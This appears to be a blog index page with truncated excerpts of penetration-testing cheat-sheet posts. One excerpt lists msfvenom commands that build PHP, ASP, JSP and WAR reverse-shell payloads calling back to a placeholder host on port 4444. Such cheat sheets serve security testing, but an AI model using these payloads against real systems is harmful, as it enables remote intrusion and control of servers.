Misc CMDs
Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading
Looping: for i in $(seq 0 10); do ls; done watch -n 1 ls -la watch -n 1 cat someting.txt Find Strings in files grep -H -i “Some Text Here” * -R | cut -d: -f1 | sort -u Grep… Continue Reading
Web Based Payloads PHP msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.php ASP msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 -f asp > rshell.asp JSP msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f raw > rshell.jsp WAR (Tomcat) msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=4444… Continue Reading
Hey Friends and Welcome! Sorry to anyone who are waiting to access the site. 🙂 I am planing to bring this website online very shortly and I will keep adding interesting and useful stuff in to it. This new site… Continue Reading